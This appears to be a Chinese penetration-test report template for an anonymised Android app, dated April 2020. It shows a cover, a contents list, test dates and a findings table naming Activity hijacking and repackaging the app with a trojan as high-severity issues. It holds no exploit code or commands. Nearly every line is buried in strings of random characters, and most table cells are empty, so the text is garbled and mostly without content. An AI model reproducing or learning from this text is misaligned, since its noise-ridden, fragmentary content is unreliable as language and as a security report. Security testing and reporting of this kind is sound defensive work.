/ v e4 M( b' \" S
3 \% b" z5 _; r' h% y# _
7 F& f. Y9 l5 k+ p4 L+ x I2 K, N- P
) N4 g6 V, X8 U( ^- ?9 y+ v
5 H& c$ M. j% f, P
% w, i/ I( L: J1 X) C+ D; n( r
8 ?( j5 T* _, j! U$ `
, E3 Y: [. D2 i+ ^
: r0 ?: Y7 W4 b& r/ [# w9 M* E
; L/ j/ e) g0 S( d. B' ^4 Z
( v; s& c& f9 v- S/ E. l 文档编号: 1 S, |3 G; |3 x* E( r. c& t0 i
2 R1 Q1 v# r- h
7 d: ]1 ^8 L+ N/ ], ?, q
) c1 `. B6 r9 a " S7 z3 o; G" S/ Y4 L
8 ? M+ Z( ?8 {$ d' w$ Y+ z
/ t+ v% N- j& \$ r# Q B7 P6 ^8 o: q
" h/ Q% A; j/ J6 \6 p9 C. p( i+ [0 a2 M' a6 F; k
$ I; G0 |) C0 O) }+ l
$ M4 z8 r# @# V E# r! E7 V2 y: E8 ~, j
$ ?7 Z1 g9 [. Y/ O* ]2 A% p8 C7 k, B
4 N+ R! o s; }8 l0 A/ O. @
7 e T, e; ]1 x
( b2 t) o( S0 y, }7 A" p7 |' a+ W
7 o% q. z3 C7 V7 p% o, x+ N
" K: D0 E5 z* e7 y. ^3 n5 Q' W( a: y
5 X" b) j4 s! C! b
/ m2 H! |. x* X, [ 5 @1 x8 S3 ^. b" e1 v
; r+ F; ]* o. l6 e% s4 k
) b- W: ?) [6 N/ N+ X
6 k- n& m- h, V. z1 g
/ w; l( x' Y6 H4 ]
) u0 r5 E; m S$ L, ]
7 M4 h) Z- K; D% B( h5 ?7 M
/ R* R. N' [% ~$ K+ x/ T
2 Z9 ^2 X& R% `5 V5 M. T
# n$ r7 N3 ]1 k; i% @( o h" M
9 j% d+ S, Z4 W6 X9 i) ]
$ `* o# F* |- b. g+ b0 \
4 f3 i/ K% f4 P E2 ^+ M; E& P# o/ ]' h4 N. \; ~! }) K* r
某某某APP渗透测试 2 N# y l) |5 v. v! _; @; [) m W
/ `( d! E- u2 K' c/ J, ~" y
' d) Z4 ]5 g& I5 d
$ c9 E1 k8 A: G# ~3 I. _ 2 \% K9 f, s) b& @
, F/ y0 M+ b# {1 J2 \
5 K5 M1 p4 u$ j- _, b: j
; Z* M" K. b' G) \/ d+ J
; F7 k! T, G* T' A9 F" H# t8 G$ \
# W: F) i6 ?" e ! R9 }6 r' K. o/ u: q
! ]' h2 x; o! Z; K9 B; g
. W4 I& \- U" n, k( i5 z
. B- i' K! }1 J0 W
: Z! W! D( L% p7 d* p: R. b, e6 o4 N( V! S. f8 o# q
' `: z7 f6 b- V) g6 ~7 O, k6 ^0 E0 w
* x( U. G6 r" O" L6 Q' T* ~9 I, v8 | & u* R& }& Q, h/ {/ d, ]
4 ^/ ]! F9 P/ k+ {9 k/ I& l
7 [! R; d2 v5 K$ \0 v2 w
/ N' K3 \( x$ O; p" {6 J
3 F0 A: G' o- |, l; t5 h; y+ ], C
3 m' z3 D0 }, P+ e6 L: N/ H
; Z0 x9 j; O; H' Z! r/ d; Z) _1 x! u4 l" I) E9 w7 O5 v6 S& H% D
& x- e4 n; g( ?, T
! {# G) z: x% J" O7 x: ]- E s ! j: \. X3 c& w. u( j7 P* f
0 l% H( Q4 `3 Z7 {
技 术 报 告
1 F+ I: m) e% a
, [) E8 l( W8 R! L0 x4 U
: b0 s& i& F; Y. Y* g6 B# E3 z" _
i3 q& }2 P; x1 W) G. u% m& a : G- H& N- }6 ^# i3 q8 H
8 e# E) C* e; n0 t! m
3 C- e" H% z6 P$ f2 D. t
# c' n$ u. j7 m5 ^1 ~
$ `! P+ Z- t2 Y( Y; E# A
i q; K5 }5 D; N
6 o* t e8 i1 i) y
3 K* X3 {' V" D. t; e8 p7 G
% z: `8 K- B2 ]0 Z `7 t2 q \1 \% o* n
- g. Z) ], G5 J/ q* X4 j
2 j6 _& X+ A* `% M0 G/ v
& a1 z Z: y+ h' r1 }7 d) G- r1 b1 B9 w2 `/ S
: I' y% Y; r6 t/ {7 r) x
- J. G# L9 ]& y) h# t% v
% w5 @2 `5 i& I1 X: {2 r, q7 T+ n
) S. ^) `) t7 M0 {) z6 Q) q
/ E" X% U6 y! \/ B
0 C: B9 z/ U1 A/ v) j. U 4 m m4 T. e" {6 @8 T q( j
& W4 H M4 m# ^3 k% g8 }4 v }
6 X. O; w+ B6 x" Z( w$ F: X
& z& v3 K$ m2 t8 R6 O1 A 0 c8 K& J$ @. p" B) `- b0 T
5 U3 ^: K" q0 U5 g: d* a 6 x1 Y4 b1 m+ _/ r4 \
% @4 x( v: [5 o
- K* S2 t. R* y: D4 d8 B
2 O: @% h1 N0 r7 C6 U% j * u9 w: a+ v- p) K3 g- F7 e
7 B% M7 t) w* D, i( t' |4 _1 j
P; N0 s! g' ]6 |3 J8 [! W; ?$ |$ r1 S" K. `/ V X( E3 e8 i
5 T& D5 }" j5 f" S' B
4 d1 E4 `/ [* s
- i' G& X0 o" _8 h) f# B
) Q; A5 ^ X1 F7 I" j7 q! H 6 @, X# m/ h( q0 h
$ Q8 e$ v1 q# b* Y, ]5 i+ a
2 E* J6 x" b0 G$ C/ r
. |# N1 D# W R+ B2 m" w
; F/ N& I9 M; M2 }+ Y" I; Y3 y/ G, o* q; w, q$ u
6 D$ b- @# c9 A! F7 m, ?' q
5 ^" e) n. `5 c$ [! `
5 b5 V6 C1 x1 ^$ N5 I8 f! Y ?! g) _2 _9 A7 w2 M. i( u' o
7 P6 i. _0 D" a" f
0 q! ]: j( V; O( R
" | h. e, Z2 F& D, Q8 ?& {
1 k2 f5 W G& ]/ H Y% w
' {$ j8 Z% K7 \- T* @" `: E
& a, b6 m: r; Q
' C) @4 L: m4 V$ M- f9 X. L5 z6 H9 i: |
& k+ j5 x6 X+ c2 _& i8 R
% Y2 W; {7 B: { O7 W( N
6 ^0 Q, m8 @) L& S8 ^# y/ _ `6 y) A t/ `
7 \- y v! i% q/ x
4 r" C" d- b8 ~ / [- _# n9 }/ ?1 r
5 P9 J* F! ^0 n- Y3 X: p" ~0 u
/ N# S. p6 G* ^* T3 z& F' F2 i) z8 \& P
$ J( P/ z% e7 r$ N* Z1 }0 P5 _
1 [; T6 d% ?6 }
# [2 P+ w/ d2 ^- q
/ P0 Y, c! q: f/ w3 `
* n$ p. l/ C& B/ P! E# g: p# E4 c
" ]" g& ^, o3 D% p$ j+ _- U' M. e# W1 k& b( S
7 x1 S1 E! e1 h7 u: q2 m9 a2 d$ h) w! a' d2 r- K
. I$ H# K7 Q& n2 I& t' q
1 g# n6 O- o$ T* P* B
5 j, ?- l; x' ^2 M% X5 \; t/ D# n& X' G- l3 T% n
. ]$ \1 R2 Z& _
8 U. E T8 Y/ L' H
( O) z5 t' \2 h" l J+ e+ }0 @: Z1 ^$ X) t+ _
7 T* Y! C- D" d, y; b) }( E) H0 `# t
. }# u$ q4 s2 k4 a
5 j; y1 d! z( Z7 n1 f7 n
' Y$ I0 u# ^: E' L+ _. J
& i2 A. V7 M3 p9 v
/ J/ _* {$ |3 X
# ]! y* d: X$ c9 \6 \* E' c: c
9 ^ U7 M: @1 w' u6 X 1 {0 T3 r0 q/ P1 a8 L! ?8 v. p
. I8 o, M ] m1 M2 i7 i7 R* d
5 F4 c) V8 F5 x$ ~5 M/ L, R) W- Q2 X, F# m1 X
# Z/ v; c4 g# n2 o5 R0 A. p+ D9 z7 E# V. }
7 v8 L4 m- M$ g8 U
$ c1 o# F8 `- m8 S$ X
" v7 q8 D T. h; q5 u
6 P+ m% ]% i: g# G y/ j0 c # ]5 ~4 ^7 n$ v0 } c6 q! b c
2 t2 K- Q/ _# K3 E" a
" L+ Y- N9 S/ Y; u+ W1 ]% p2 `
% U& r" |8 d8 \
7 z; \0 n" ^9 ? u4 J
1 U, `3 |& N! h
$ L6 [" C" S5 K. N1 j
% K) N* b" [$ I0 f" K7 X 二〇二〇年 0 d, v: T! ?$ p# [9 b+ x) a
8 N. D$ R2 b3 T9 J! D3 f$ a
8 c$ g# O# ^9 i: F a: B* Z0 E4 J* n" k7 d3 G7 P- q4 {
7 ^+ R) ]) g8 q% z7 A5 I1 m5 ^, k) Z& I
7 Q0 Y4 k3 {! j
0 y' h4 S C% y0 V0 p 8 A4 \" [3 r% a% q; x
- s: p: s* K5 ~5 t4 s
( l- B, }8 h* k) I
9 W) K7 X. u6 w8 {& q9 F( {) B
+ Z# z& x7 i5 z# K
* }7 \/ _* _& z
$ n- H5 O/ K& {* Y# {* H |" w
* c& Z9 |8 h7 R- F2 R
6 G _4 w. \9 K' s8 F! o8 _( W& m1 Y) F
7 W* k" Q; l" {2 p2 V- G
: H0 {, X1 a% n7 ]0 Q* k ' @( p0 w, e6 V8 K6 [
. Q5 Z; O& g. v/ H
目 录
% _* ~" ^0 W! i4 x* `( q, _; u4 m8 n$ g5 p: A4 L& b
6 Y' w' d6 l3 x. C3 M
9 }. ~, ` K f: s, j! _
4 y, P4 i# O5 @, i8 C% j: ]+ P$ O1 ^0 F# m
& P5 g# b/ L: w, q4 l" b; @* A" a/ m/ P6 w& Q) M6 T' g$ ~! a
* i& g: Z8 Z, t! u7 x
`0 I Z0 N- s* c" ?6 w& m5 V
_/ f! ?3 W X/ A6 N
! V( ] Z! M4 q
" ^3 |: G, w8 f6 V+ U& H
7 b# s7 s. E0 Y! ~
1 概述... 3 5 {/ B- X3 T* b% o; M: Q2 w0 S
! i6 q/ Y1 W$ M
) S$ x& w. P8 r' W$ j
" ?1 T( @* |& F
, F8 @$ O# o7 P w% _, ?5 C
- ^0 F( ?3 \$ m 1.2测试时间... 3
8 n( B' t' N# H1 i) e/ G+ I z8 H* `+ `7 S+ q
; H6 P9 j6 ?7 @; V& j5 B) C
6 C. E! F% ^& ?
% t; }( i, v8 t' U7 O9 z5 \5 l9 F: B
/ ? q/ T% `+ _; z( i9 q 1.3测试对象... 3 & j' A, l/ w4 }% s
. y, J" g7 o/ ^
- Y7 V9 Q2 C3 u6 r2 N4 k
; n) I, G9 f' D4 H, b; Y- R / N+ A0 t x& N3 L3 @1 x
% N+ m' c0 I8 O- L 1.4测试结果... 3 R, Z+ N3 n$ g) y: F
' y8 q& c# @; M" m0 Q
5 U/ d" s: k7 ?: L% m4 o }
1 O0 w, ]" W. p* q # z, q8 _# C6 u5 g; u. G" w) B% n
$ Z( g e8 r- L& C- u
2 检测结果... 4
# \) C6 w+ L8 N6 W; Q- B2 L+ a! X) v# ^8 i4 B4 v
, r( k+ U$ `' J S
# Q& `8 R( F6 P+ H 7 B/ V5 I# x9 R d# w" ]
7 d( D0 a9 i0 s' d 2.1 某某某... 4
' k9 H0 L8 G, i9 E! W
1 ?9 G. W6 M2 g% K% d
/ n: v0 m. [0 A1 B1 u9 w
0 Q( h6 X# |, |+ N
- [, {) c+ p) R: K6 {2 W" T+ ]
4 ~% {+ d/ N1 @% R, B2 G 2.1.1检测目标... 4 2 h% r, C: u6 i5 _" b0 m( `& u
; b7 _& _& `) B1 ?0 M9 m
) o) O/ P! ^( t M& Q- [" S
$ Q, K, B2 l4 m8 w, M
0 D: x, e% u/ o3 Y
+ T& Y4 Y3 p+ ^ z# s
2.1.2检测结果... 4 & s5 c+ B) `; e* d5 a/ |% @
L, g4 [" B4 ^8 s8 K
% L. q1 W, n1 X
) |; w% n2 P3 O8 @! N5 C6 ?
9 ~. S* G& a, d! z* H# q6 p
3 _, w# @; T: k/ D0 x7 n 2.1.2.1. 4 * c$ ^& ^* c/ t( t, c
3 t( Q& k9 w4 p
2 D/ G5 y: |1 Y
3 {1 s8 i1 a) D# |* D) Z+ G
( d( t* b5 I( j$ ]7 @
9 f. k; ^- _1 ^ c8 S0 l
2.1.2.2. 6 / i/ ~' r4 U- U1 Z( S8 N
. g7 d+ L2 W. Y9 Y. z9 ?
0 @; B5 j4 K; a+ J
6 y1 I& S( d+ Q* T$ t
0 x6 T% T' [* y: s
, t4 }& J0 n5 y2 U: n
& @3 O: \/ Y5 y5 @3 ]0 q: O$ P# _4 A+ l9 |2 w" z
3 y& t& Q! `/ c% Y1 D" l8 W* b
9 h8 `. u; v& C$ t& S2 K
4 P y2 I: p1 Y
1 Z6 [& |* @- G' H0 j
, U/ x" @% I/ F& g. o& Q
2 h5 f" N4 q' v0 }
2 H% D% o4 y5 A, R- W
1 | i- b7 L$ R 9 }; F8 Y4 K ~
' B% X/ v ` R$ `( N# [' m
0 w) x: W& [5 j7 T# V2 U2 c* x ?. E2 [( ?* S# n* @. X
1 概述 , v3 c( h: w) b5 P5 k
7 h1 P6 g( X& W( h
. o: `5 ]5 _( ?7 w9 @2 O* {6 |2 k4 O7 A9 e: ?2 ]" c* O
5 N( ~7 z1 ~! [/ v# r% V% U o* B$ Z' n5 [
1.2测试时间
0 g+ n6 {7 c' L+ m$ t
% g. U* l6 ^7 V( j- V3 b, u/ W
7 |3 n2 C2 Y! _
( o- c3 K0 V1 F9 b4 D l 5 Q; o9 j1 F9 k5 R/ L$ ?# d
, ]8 l4 l5 D' G$ Q R. M. G) a 2 W3 r _5 [9 S
# |- c' b& J$ ~5 S$ Y$ ] ) k" q; I5 n# h- f: |) I+ x: p9 C! f
2 s5 N0 C( J* b( E
4 I4 z* `4 H7 C7 l2 R
0 e( N+ C% q( P; m( b% V8 M , i' f6 I& H, I ]/ A$ J$ t A
' h" d; E0 f# @$ Y
渗透测试时间
/ `2 @) S: u/ c0 p9 B5 |; E" I3 l! `' K3 E( N" S/ b9 K6 s
3 S2 U- Q5 S' Z" \" K
/ x/ h6 t) d$ [8 E; O |
8 `: `( U5 |" K7 z0 d
' w! _0 o& q' c. r0 f
, X Y) ]9 r [+ c! [
& T- }7 {8 [8 p
) g1 {2 O8 @% k1 G$ f6 b7 Y0 j- w/ K; P8 |
& B( J) K: P# s
6 G4 v; |4 m# x. X
3 d1 D8 ^% k/ A( A+ j2 @4 l3 U2 H4 h+ S1 D2 x; d* C7 I% F
起始时间
% m8 W' I. n8 w5 V. h6 B1 r8 H% o( f# G% {0 k
5 s" F$ E0 v: ~2 M& @. d/ b" Q; v1 v- K
) [+ N; r- R9 B% V |
0 W& _6 L C0 W% u o9 P: Z7 b0 ^4 H. J: L, h
|+ _( t; f* ?
0 R7 {/ @9 u% p0 C
0 y& e @% O4 V) q9 Q, d- s! I; j: u; I% O; f$ H9 O6 T
2020年4月6日
" z$ B4 X- T* ^: q$ P, Z
# {- {5 \; l# q% g: @+ C) k ( A! f$ C; S7 y3 p* Q
/ z7 e. B" P$ e
| " b O" k5 i- o% f0 R6 v
9 r% h- B' ?( K$ N6 s0 h8 z
* L) }; z W- V7 U* ~1 r; P# B/ c8 D9 F0 a. Y
. u% i7 h- m9 w4 u, I. N$ ]0 |6 V6 G/ ?! y9 T" f
2 h. T" t) b+ S" q
4 g5 D: r1 u7 I, Y7 K8 }9 L1 d
, _8 E" `9 n, \/ \# ?8 D% b; _ V( L! a0 m
结束时间
1 R) o$ r2 r6 M. t0 ~) G1 s) C. C: c" @' m8 p# V1 l1 y
- e _0 [( E( |/ s, {! @! W. H
) p, r; `4 |" h8 @$ A. ?
|
7 Z9 Y, V# H7 }) y8 z
0 M& r4 o& H$ S
9 ~1 ]3 a/ Z' {) a: p3 a# N1 k6 n0 }4 @3 E: {$ d* |, \1 G
+ D# l, z9 V" w' W- @( A1 O0 H g$ R$ P8 y5 u
2020年4月9日 4 i+ U7 { a/ [" J
* v9 |9 B# k/ ? 2 `1 p. L& H$ o2 ]! ~: W
7 z' W9 V0 `1 @& u
| ( I. Q" e6 M. A2 ^2 X
: I7 U' l2 y% v- j) A) g' z
N/ t( l2 _; ~+ [/ g) D' h0 j
" Y# Y: l+ X9 Z8 \7 l # a$ p, C+ D- D7 T9 W3 ?# {) M: j
& Q, T% V" d! W {
$ ^: |* [5 l6 A! i- Q1 W% R9 G3 r0 u$ a& {' k9 s% g% z4 K
, Y( }8 t+ I" S. u; o1 o, P1 L
; T. A2 n1 ^/ c* ] 1.3测试对象
0 G, a# T9 n; L' a8 V. m( P- C i. P' z( t2 d6 g, d# U0 }8 q3 q
4 d/ b* r5 ^) p
0 Z8 r; A- d% E P, [ 5 a# y2 v; i) E- S$ T& l" `
7 b8 _" ^; D* F6 Z# G4 M% U
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: $ [5 l, b3 h4 j; ~% a
, V8 J- m# G6 L' S1 s3 M0 H
, c6 J, r7 ~) a* E6 A- G- F
0 ~3 J3 p9 S1 \- Q7 ]( X2 B' K
! |$ e% X1 g: N7 _0 S
4 K+ S5 {0 C# k8 _' e7 P- v: m
表1-1 检测对象 . h! r: j3 B# d" o
( r) C: O# V4 n% R4 T: v( S
6 D. F6 g2 j7 J1 [7 ^, D: O* `6 A
$ e2 ~( x% }) y+ ?0 S4 w
" k) L/ ]7 Y6 ]- W5 S! T8 q3 s, {' D/ B
- E6 t! E \' q6 o% x w
$ r' R% ^* u3 f) N. {
% o6 r2 T2 V+ |9 \8 s9 y# Y; {6 k1 W. Z9 W
6 Y; p9 t9 C2 G. J' z
. L1 S e7 }0 ^; ^
/ z0 Y! u1 P" g( m N2 z+ c1 A0 F! P. `9 O: W1 _# F( E
序号
5 Q$ {- [9 d2 ^ D# r6 Z; F8 H, s$ D
6 X; T& d* U' b/ Z- A2 y, |
5 }0 V% |3 {/ U* ]4 }: N2 r# u | 7 }2 o! _, V+ O4 M3 v! E
# J& g. v" ?+ B# b# \: n0 w, t
: u9 q3 [+ i: U# l; R# G2 k
8 |- z" ~ j# _! }) e0 c - n" z8 i% f7 b! C' M m: b( x
# ?# U4 P( e3 _0 h& t0 x
测试对象
' b& Z9 {, l: B8 y
) s" S: X- [/ G7 {: k8 v1 ?/ M ' G3 y5 j* L6 @
( J) W2 u% p2 _/ }7 D
| I7 `( e2 d. [" y7 l# k, ?
, O. D1 w' i- d$ x3 g+ t
1 t% r2 \" q/ t9 V- A& A$ _
3 S0 c# ?. l8 i; U: @ . p: c/ B2 T9 x
1 B0 S Y* {3 U0 c2 O# e- k
测试地址 8 o& Z# N: x8 O
% s4 V6 s+ r; B3 a: o: y/ v
2 ]+ d+ @0 _( h
- R% K$ N2 \. V) f9 L
| 5 q( }* N6 b3 F& W% G6 d0 u
8 m" U" \; V5 w' L
8 U( P7 ]- V$ c/ C, N; \
5 U. w E& {" m, N+ ] h . _$ @9 s/ s8 W/ E
* q1 b( k2 Y: g" d
安全漏洞
1 C0 t. Y) i9 Y% Q( C
5 V8 _$ ?1 G2 b& s/ _& U
/ m9 x, k; @+ T; `# `4 P( }8 Q/ g+ _; r. ~* S. i* _, u
| ) p' A& B* z; a# [$ T: X
* x1 h* @; Y+ s
* g; H! `. J7 k
% o8 B$ o; `" c9 z 2 @ D9 X0 I* t1 R* S, `
3 D0 s# C! @9 c$ h, c
9 f7 {( f+ V i9 f3 N" E
0 M$ m5 q' @9 z( Y3 X* M
& t [* Z- a2 d( d
. Y T2 ]" f7 L+ q* a) b% y6 W) j
1
7 u3 z1 {* W. H0 c0 f& o* `
# @, K+ M* n- E D* _$ n6 Z
' \- L g/ Z8 w$ y9 q, j9 ~: y3 I, |: q+ A5 A( x
|
& n2 e* F5 \2 g: w% W: b9 T t
( @; J9 `# O- }" m I, f. E, @) b
7 _' w* @& o: ~
1 i ^. R; y: v0 S
. g4 ^" r- T$ ^2 `$ h2 o+ S: H: j( ~
) e1 T0 N( `5 w) r 某某某安卓APP
( W3 m% ~! J0 B D O. F$ x
" G6 Q9 F( u4 l
: p) r% u! e- _& S8 Q
5 p: q6 t6 K _: E/ a; | | 1 o& x7 o E7 `) T' {
9 e2 j' N+ x4 S, \9 Q! Y. u
/ t3 Q. J R6 T' m9 R5 m. J: U- ~
3 b) Z) G2 M6 {" a. J- Z8 @ ) n8 q# `' ]6 L }/ x) V. D6 L
: a5 k6 w) E9 X1 ?. K. @7 A
4 `" ?2 `* [8 f. H
8 |* P# v: e( ]* Y* G
?6 z. C3 S; N! @1 n
4 N2 a2 \: V! e- Y1 D | 8 O" E! n; R( j) i; t
+ V, @8 e3 S& h& c! z% Z
( e" F% C; _ {, I: _
( L' U0 {6 S0 B/ ]9 B8 F7 Y4 V, Y& o 6 i2 p1 C" p) I: U
. M0 b$ i) C5 D$ D+ k
2
& d5 o2 p, t% L* o w2 X5 A6 c; I8 v
5 {8 R0 Z% ?9 a$ v. I; x) Z
) ^2 M; W2 Q( n) N/ O" p# k | 5 R$ C9 t) K0 w' ?2 M) r
' x7 C5 _0 t( c7 Z2 N; Q. ~
1 G- ~- G( |* d9 u" k# K( I2 s9 Q: z A$ Z j( ?" r# C& E7 N! C
* H* V9 E1 |9 M
* P, f. C! [3 W+ u" O$ T! h) k
' x8 [7 T) v9 |/ P2 G* w( u/ s$ w
e& x6 W! @6 f; c0 D6 N* m
( U/ T# \+ q T9 t( [; j# Y2 t5 v7 N0 D" o" W
1.4测试结果 & ^* v. Q! G6 I$ |) u- w
7 {7 H4 X" G* e& {5 `& f
2 K! g9 G+ V0 b" b, p9 b8 u% H3 I& ]6 M' p
. }4 p7 Y3 C2 Q3 {' ^! u+ Q5 p+ G, S- B5 a, W
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
9 |- X/ L& V$ c; z/ ~8 |, x1 A2 w9 \5 n9 e8 X# Q1 A% k
8 }4 V; y4 ?* S5 T9 A9 B' H$ Q ~! }, q9 w; Z% _( Q+ M
" b( T x+ f, U9 r% R' @+ V* j& ^
! ]+ V/ J' F9 E! N; [! m6 C5 X
4 s0 \- q# t# V3 [# @. }* y0 g
) k# E! R# E& e) p i" i
$ v5 Q0 I( o- o" k! {6 Z; H
% \) @+ ]$ o% b" ~/ n- l" N* K" r. a. O
% r! o, E1 O6 j
1 c+ Y1 Z5 m# f! s- N3 g! O
1 E9 z( ]! \; x: `+ A/ O0 N& r+ \1 y6 x. R. s
1 K) ~& V$ X# [, A U0 V2 M! Y
, G6 L8 V8 t+ v w1 w 2 K1 k4 A3 H0 I# T/ q+ l
# g& b) T1 ^3 l) P
; v) b8 p) \6 ~$ @( r
$ j9 M& g5 e- U& w3 f
序号
1 w2 C9 k& N7 x& W O& w6 J
8 O: k8 L) A e+ W
6 L! j# x7 R$ G( {8 {5 R9 y) T# p& u! {
|
. D5 V! T3 z7 K. o" b
5 K, X3 N# v! o6 \! p+ U) V
$ u! e5 K' V. v
9 r6 m) g; Y* w2 F$ T# p
' b1 Q: ?' |, o9 |7 `" m) @( [3 ~2 W
系统名称
! E6 O! g% @' H5 R. n, | d, z
$ V! [3 ?% T$ ]4 W8 {# G ) z4 U3 x2 Z/ |/ @
# c3 T y9 ^- I: W. i9 C% o |
2 u2 y* z1 _. I& ~( Q# a7 {. T: \) D; w: \) {
$ A8 G ?4 v+ X! B
! k9 z4 p4 ]( _* g2 \
0 o m% d! S# g; s1 l% O; v7 |" s2 Y9 h9 J4 q7 i, d6 q8 q$ M
漏洞名称
5 z$ _3 }) ?* U1 D( H
: ]7 }' U. ^3 J3 l: V4 ?2 L , K8 q# }5 _( S# P7 }! f5 ?4 h. Q
! s, g/ o+ D& k' P. _/ F8 z
| & q$ n# x' a3 m% x
$ Y+ j* ~% A4 [+ E$ [
( ]( d2 O* ^2 P4 Q7 y A" y
" j$ A/ j* w4 Q; h" [0 J' A
/ g! i, n6 }- r4 ]6 T
7 i( C1 y7 p. O. ? A7 h+ b3 U 漏洞危害
! H5 n) R/ D3 J" S' Q8 p4 b+ j( h% t( Q
' d: B/ l. w; B( L4 ?1 J/ Q6 `
! Q" x/ V; j1 d" Z7 _5 O) d
|
# Y! k1 q6 m; J7 }) l6 W+ d8 T, r! `1 j8 s, @+ H
) Q, e/ j1 z# m
/ P, q8 I9 c Z* p
1 t% K/ R) Q/ D* Z, Y h+ l. H
7 h- E1 O( {8 e: P
修复结果
6 _2 _$ L: x" q! d$ s! b' l6 A" ~/ K8 D' A4 D! S. ]
$ W. x) E# e( {$ d4 W, {7 E
& ^2 A4 w7 F4 { z* D
|
6 g3 z u# G2 g* K
4 B7 B2 t; i/ C+ U9 c* b
8 q: N8 o$ o- o& t' A4 }: b: p0 ^6 }4 l" c4 |" e8 a
5 U8 F$ F# g. e) H8 j9 D+ x. @2 S2 L0 |! V4 a4 D) O9 U
3 Z, n7 e6 o% ^$ l' j( V+ d. n8 j$ A! h( P6 b8 K. i6 |2 W
, {7 h! |6 P1 h
0 g" X* B6 _3 I9 I' y 1 . b; s2 [: S% n" k0 H1 Q! B
3 [) g/ k6 t$ B3 h8 v4 I/ ^ y/ ?
' h L- z9 \8 H+ J
0 ~8 g" t2 y" a8 K |
9 l4 e0 ~5 x" x4 w9 C
5 {, R3 {2 C' W
; E& [0 T) l: M; }' U3 o0 Y4 D3 O. n+ o2 w
- y) |( L0 u- i' o% {" e. S
0 t& _8 R* p' G$ C4 E' x 某某某某某某APP 0 T7 K* P# W5 ?1 r* {* j3 W
% A* ]4 s: K! x+ s
% B( G W5 `$ N( h$ X. L% k& H+ Q, V9 p4 |8 y% f- }- ^
|
& Q$ `) i! l2 o' f% G3 V# R) v" g7 o0 g6 u3 ~6 k" v
3 K+ S5 W9 F7 }5 Q( @
$ n# z) Y3 y) W( V2 X3 Y4 x# R% n
7 H b; F# Q( e
! q8 C* ]7 {* B( U8 s Activity 劫持
6 g, I2 }) o, X3 ?8 c1 T k, y' N/ i5 S% W
, Y2 r6 z; Z% H8 x- ^5 S& S0 Z
/ z* g; O) D, C: @1 Q8 I/ r
# ]3 \1 d% c- l- d
, ~/ ^/ m# H4 L, g $ W/ g. N& j V2 k! D
/ `4 ^- F+ u* F2 K0 R
$ r: O7 f: G! J" c! u; M+ G( p( O( k2 }0 ?
|
0 x4 k8 o" B% a3 d4 @; |( x* N4 _7 `+ o
- t% m6 d0 @, m) V5 I0 J1 Q7 m/ X
$ O9 ~/ C3 ?: t3 L; v& D. `: d. F ; v4 A+ A7 [' G' R/ ^; y; E
7 H z# b6 Z; W/ v6 @) p/ R
高
/ t D+ @- @$ v8 A8 G, ?4 S6 S
1 K8 b8 G$ y' J# h
0 V, w" h8 D$ ]+ o ?" t& t* m8 J V3 f+ ?- ~; h- ]
|
+ r8 o6 }( M* h3 b
& X6 ?- z5 P" \6 x
# T" \' u% y" B2 D; f3 P/ K( d1 }# F2 ^ f0 V
) ]5 Q( h4 y# w! C9 w5 Q# k( _( J2 s& Y9 T- q
. y' S3 [, @, _, P7 ^
6 z. H `0 b" U5 O" ?$ _' G
8 U4 t% y2 `2 |% q/ O1 R- M) e' h% q: J& p
| ) b+ Z% r2 ]( x; I
5 k5 F& X3 y5 R( Q
2 B" Q$ T( q& T+ C; ]6 b1 u
9 N6 L) |8 Y0 R( ^ N" \ - x9 P4 h; O8 u, Y8 N; E
: N. H' e( Z& W+ P, D6 Z * T% T. g( R h: M+ p4 |2 l8 q
4 n: `9 r# a, i( I, p( W( L
4 L8 _) U5 A& ?# N. Y/ \; [; e, K, N0 }. H' s* I0 o3 I$ [2 W8 [4 u0 X
2 3 ?" n& N5 g9 s* ]# t2 w
( F# F8 d4 m: _& ]* {
$ H. d( V5 g5 Z% t; n
" c1 R H- S6 o; ~6 k |
) W3 F& f8 ~: f
( X) l; c I, v8 `: E
2 V& `# |8 d) G- R7 K4 n3 g {: B/ r* f7 F, p) W5 K
' x/ o1 R1 Y8 ] e
Q* W2 r! X7 c# A 某某某某某某APP
D/ F( o; J- E1 e* e' k$ A
# M8 a# |# y: o+ O3 C
% H' u. ^7 Y, g$ D8 A- W4 t8 E! _) U6 y
| , Q0 n2 |. U7 N3 T! |7 ]* d* _; m, o
" Y! [' N, n1 a& p) Q/ D, t
+ S/ o1 u$ j7 I* t2 q; Z2 b
L/ [0 t- q9 @8 Q) g: L
* s; B, X5 e; \2 F9 i1 G3 \
& R4 S2 V- h# H) n/ |2 h
反编译二次打包捆绑木马、篡改APP代码
# B" s+ S! n' N& j) E) S: p% I3 Z7 X& u T
% O" S5 n2 w/ I3 Z, i1 {& P& B
& @1 H. f" \* w+ p0 @2 t6 Z | # a# L- t; C3 |. L/ g( f
* t7 H6 E' D% }1 V% k3 J( }
" E2 J7 }. C: {5 j$ z
7 Y9 U" j" W4 k: l$ @1 z! k- e 7 N T8 o, _; f& z
3 n2 ]& z% P5 r3 s1 \
高
) Z# D2 d# b [3 V2 `' X5 ]: D2 o+ y. V
; [6 v4 S. Z- V5 H; X; Q
7 r: u$ a! R1 D" B; X3 V
| $ e6 a3 C. d# A
2 R3 W* I" W! ^) u, C& m
! v4 k5 H( `( |; _3 b
6 W- S! j' T4 n! w' {
# O& Y& L; r0 r! I* G* R! _) n
& g9 E. I# j+ Q
3 d# [5 v! M8 n7 Q$ K
- b3 O2 x* o- |9 g4 _. T
/ c1 u5 Z ]- ?' v) |9 N- X0 i3 l: J: h; X" s+ }; d' t
|
0 u' |, k) d3 v- a, ?" O r) G/ e- n& n' m) ]
5 X. f1 W2 ? \0 _( u0 s0 g# h
" z! e0 z/ f& s1 C
1 K# d) g. t5 |0 _; B% k; A% g
/ \/ W {1 V% g S8 D# F; h: Q0 F' y2 O, }
; G( _) q: q& P3 T6 B7 @2 X G$ \' m9 N* H, |) g
$ {/ W/ v8 v7 e6 |7 ] 3 `/ n8 D4 V& F% W/ E5 f
# x: `3 b/ X7 C 1 o& U# \% J* d2 U2 G$ L
% S* G- A* m, A1 C+ l6 P
) a8 W" A0 v0 w: L6 B1 C
/ z2 ^& N- D1 o
6 w) G: d$ v* v L C: f1 I1 |/ {6 O+ M5 ]4 g
表1-2 测试结果 - T4 h2 S8 W: o9 s
2 a2 }9 G' t; u5 m4 ?9 c9 d% E S
- O. _2 e: u2 v, ` a2 T
( _ v9 C% N7 l. Y
